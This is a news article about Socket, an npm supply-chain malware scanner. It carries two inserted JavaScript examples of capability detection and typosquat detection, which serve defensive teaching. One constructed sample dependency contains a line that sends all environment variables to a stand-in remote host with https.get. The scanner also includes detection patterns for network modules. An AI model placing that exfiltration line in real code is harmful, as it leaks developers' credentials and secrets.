But its popularity has made it an attractive way to distribute malicious code, as compromised packages can reach a massive audience with minimal effort. WhiteSource, an Israel-based security company, claims to have detected and reported 1,300 malicious npm packages last year.
The Socket application aims to detect supply chain attacks before they cause damage. In an email to The Register, Feross Aboukhadijeh, a prolific open source developer and founder of Socket, explained that attacks on the open source software supply chain have been getting worse since 2015 and that he now sees them almost every week.
The situation has become serious enough, he said, that he finds it necessary to check the open-source dependencies of Wormhole, a web-based file transfer application promising security through encryption. “I didn’t feel comfortable telling people to trust our service with their most valuable data when malware could hide in any dependency we update to a new version”, he explained.
Aboukhadijeh said the standard approach is to search for known vulnerabilities, the flaws labeled with CVE identifiers. But these types of programming errors take a long time to discover and surface in public reports, and finding and fixing such bugs is not the same problem as identifying deliberately compromised dependencies.
The 200 day gap
Pointing to a research paper from 2020 [PDF] which found that malware typically hides in hosted packages for 200 days before being detected, Aboukhadijeh said it was clear that bad packages need to be detected before they are integrated into developer applications.
For Wormhole, that meant auditing every open-source package the app depends on.
“Fortunately, most supply chain attacks follow a similar pattern (stealing environment variables, sending data over the network, etc.). So we built a tool that would have intercepted all recent attacks on the NPM supply chain,” explained Aboukhadijeh. “The tool analyzes the actual behavior of the package instead of relying on outdated data in a CVE database.”
There are already a large number of vulnerability scanning and static analysis tools available. But according to Aboukhadijeh, these are failing to stop the supply chain attacks on NPM we have seen:
“Traditional vulnerability scanning tools simply look up the package versions you’re using and compare them to public CVE data from the National Vulnerability Database,” Aboukhadijeh said. “When they find a match, they send you an alert to upgrade to a new version.
“Traditional static analysis tools are way too noisy when run on third-party code and don’t provide actionable results.” Socket, on the other hand, is intended to provide useful advice.
The app scans for malware, typos, hidden/obfuscated/minified code, the introduction of risky APIs (file system, network, eval()) and suspicious updates. It currently supports 70 detections in five categories: supply chain risk, quality, maintenance, known vulnerabilities, and licensing issues.
“Socket uses static analysis (and soon, dynamic analysis) to characterize the behavior of a package and determine the capabilities it uses, which we call ‘capability detection’,” Aboukhadijeh said. “For example, to determine if an npm package is using the network, Socket looks to see if `fetch()`, or the `net`, `dgram`, `dns`, or `http` or `https` modules of Node are used in the package or – and this part is essential – one of its dependencies. We also look for redundant signals, such as the presence of URL or IP address fragments in the strings.”
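To make the capability-detection idea concrete, here is an added example (not Socket’s code, and not from the article) that does a stripped-down version of the check Aboukhadijeh describes: it scans a package and its transitive dependencies for the Node networking modules he names, for `fetch()` calls, and for URL or IPv4 fragments in strings, and attributes anything found in a dependency to the root package. The in-memory registry, the package names and their sources are constructed for the demo; a real scanner would read the installed tree or the registry tarballs instead.

```javascript
// Added illustrative example, not Socket's code: a minimal "capability detection"
// pass over a package and its transitive dependencies. The registry below is an
// in-memory stand-in for fetched package sources, constructed for this demo.

const NETWORK_MODULES = new Set(["net", "dgram", "dns", "http", "https"]);

// require("x") / require('x')  and  import ... from "x"
const REQUIRE_RE = /\brequire\s*\(\s*["']([^"']+)["']\s*\)/g;
const IMPORT_RE = /\b(?:import|from)\s+["']([^"']+)["']/g;
const FETCH_RE = /\bfetch\s*\(/;
const URL_RE = /https?:\/\/[^\s"'`]+/;
const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/;

// "node:dns/promises" -> "dns"
function moduleName(spec) {
  return spec.replace(/^node:/, "").split("/")[0];
}

// Inspect one file's source. Returns evidence strings such as
// "module:https", "call:fetch", "url:https://...", "ip:203.0.113.5".
function analyzeSource(src) {
  const evidence = [];
  for (const re of [REQUIRE_RE, IMPORT_RE]) {
    for (const m of src.matchAll(re)) {
      const name = moduleName(m[1]);
      if (NETWORK_MODULES.has(name)) evidence.push(`module:${name}`);
    }
  }
  if (FETCH_RE.test(src)) evidence.push("call:fetch");
  // Redundant signals: URL or IPv4 literals embedded in strings.
  const url = src.match(URL_RE);
  if (url) evidence.push(`url:${url[0]}`);
  const ip = src.match(IPV4_RE);
  if (ip) evidence.push(`ip:${ip[0]}`);
  return evidence;
}

// Walk `root` and everything it depends on; a network capability found in any
// dependency counts against the root package as well.
function detectCapabilities(registry, root) {
  const findings = [];
  const seen = new Set();
  const stack = [root];
  while (stack.length > 0) {
    const name = stack.pop();
    if (seen.has(name)) continue;
    seen.add(name);
    const pkg = registry[name];
    if (!pkg) continue; // unresolved dependency: nothing to inspect
    const evidence = analyzeSource(pkg.source);
    if (evidence.length > 0) findings.push({ package: name, evidence });
    stack.push(...pkg.dependencies);
  }
  const network = findings.some((f) =>
    f.evidence.some((e) => e.startsWith("module:") || e === "call:fetch"));
  return { network, findings };
}

// Constructed sample: the root looks harmless, but a transitive dependency
// reads process.env and sends it to a remote host, the pattern the article describes.
const sampleRegistry = {
  "pad-left-demo": {
    source: "const h = require('tiny-helper-demo');\nmodule.exports = (s, n) => h.noop(s.padStart(n));",
    dependencies: ["tiny-helper-demo"],
  },
  "tiny-helper-demo": {
    source: [
      "const dns = require('node:dns');",
      "const https = require(\"https\");",
      "https.get('https://collector.example.invalid/c?d=' + encodeURIComponent(JSON.stringify(process.env)));",
      "exports.noop = (x) => x;",
    ].join("\n"),
    dependencies: [],
  },
  "pure-math-demo": { source: "exports.add = (a, b) => a + b;", dependencies: [] },
};

console.log(JSON.stringify(detectCapabilities(sampleRegistry, "pad-left-demo"), null, 2));
```

Running it reports `network: true` for `pad-left-demo` even though its own source never touches the network; the evidence (`module:dns`, `module:https`, and the embedded URL) all sits in `tiny-helper-demo`, which is exactly why the dependency walk is the essential part. The regex-based detection is deliberately simple: dynamic `require(variable)` or string-built module names will slip past it, which is the gap a dynamic-analysis pass is meant to close.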
The app also examines what’s going on outside of the code in scanned packages, to detect, for example, attempts to stealthily acquire a popular package and then subvert it.
“Some of the most valuable safety signals come from secondary channels such as the behavior of maintainers,” Aboukhadijeh said. “Socket detects ‘unstable ownership’, i.e., when a new maintainer receives publish permission on a package. We also detect when packages are published out of order, as attackers often publish new fixes on older major releases that are still heavily used.”
It also looks for typosquatting, which is submitting a package to NPM with a name similar to that of another package, hoping to trick developers into installing the malicious version.
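As an added example of the typosquatting check described here (my own illustration, not Socket’s code), the function below compares a candidate package name against a list of popular names using edit distance, after normalizing the separators (hyphens, underscores, dots) that lookalike names commonly add or drop. The popular-package list is constructed for the demo; a real check would use download counts from the registry.

```javascript
// Added illustrative example, not Socket's code: flag package names that are
// within a small edit distance of a popular package. POPULAR is a constructed
// stand-in for a list derived from registry download statistics.

const POPULAR = ["lodash", "express", "react", "chalk", "commander", "cross-env", "event-stream"];

// Classic Levenshtein distance with a single rolling row.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(
        prev[j] + 1,                                   // deletion
        prev[j - 1] + 1,                               // insertion
        diagonal + (a[i - 1] === b[j - 1] ? 0 : 1),    // substitution
      );
      diagonal = tmp;
    }
  }
  return prev[b.length];
}

// Collapse the separator tricks lookalike names rely on: "cross_env", "crossenv",
// "cross.env" all normalize to "crossenv".
function normalize(name) {
  return name.toLowerCase().replace(/[-_.]/g, "");
}

// Returns the popular packages `name` resembles, closest first. An exact match
// returns [] because it is the genuine package, not a lookalike.
function typosquatCandidates(name, popular = POPULAR) {
  if (popular.includes(name)) return [];
  const n = normalize(name);
  const out = [];
  for (const p of popular) {
    const pn = normalize(p);
    // Short names get a tighter threshold to limit false positives
    // (e.g. "read" vs "react" is 2 edits apart).
    const maxDist = pn.length <= 5 ? 1 : 2;
    const distance = levenshtein(n, pn);
    if (distance <= maxDist) out.push({ target: p, distance });
  }
  return out.sort((x, y) => x.distance - y.distance);
}

for (const candidate of ["crossenv", "lodahs", "reakt", "express", "left-pad"]) {
  console.log(candidate, "->", JSON.stringify(typosquatCandidates(candidate)));
}
```

Distance 0 after normalization means only separators differ, the most common lookalike trick; distance 1 or 2 catches dropped, doubled or swapped characters. On the defensive side this belongs in a pre-install or pull-request check, where a hit is a prompt to confirm the intended package rather than an automatic block, since genuinely distinct short names will occasionally land within the threshold.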
Really open security
Aboukhadijeh said that those testing the app had already detected several instances of malware that they had reported and which NPM had removed.
“Beyond outright malware, Socket users have discovered an interesting new open source trend: some maintainers have begun to include telemetry in their packages to collect runtime usage statistics,” said Aboukhadijeh. “It’s similar to how websites include trackers like Google Analytics. We’ve already added detection in Socket for this issue so companies can detect and block telemetry from their open source. We’re keeping an eye on this trend.”
Aboukhadijeh said his company wants to open up Socket’s tools to security researchers looking for NPM malware and said those interested should get in touch.
Socket is currently available as a GitHub app integration: clicking the install button on the Socket website takes you to a GitHub authorization prompt. Once authorized, it runs on each pull request, evaluating changes to package manifest files such as package.json. When a new dependency is added, Socket evaluates it and leaves a comment on the pull request if it is a security risk, Aboukhadijeh said.
A Socket CLI and an API are in the pipeline. Socket package search and package health scores are available for free on the company’s website. Socket integrations, such as the GitHub app, are free for open source repositories, “forever,” we’re told. For private repositories, the service is free for the duration of beta testing; pricing for private repositories after general availability has yet to be decided.
“In the coming weeks, we will be offering new detection for packages whose maintainers are using email addresses with expired domains, which is a huge risk factor for package hijacking,” Aboukhadijeh said. “We are also working on new signals such as maintainer reputation, maintainer burnout, and maintainer security practices (2FA enabled, code signing, published security policy).”
“Our goal is for Socket to provide the most comprehensive open source risk analysis on the market, which means analyzing the full picture – from maintainers and their behavior to open source codebases and their evolution.” ®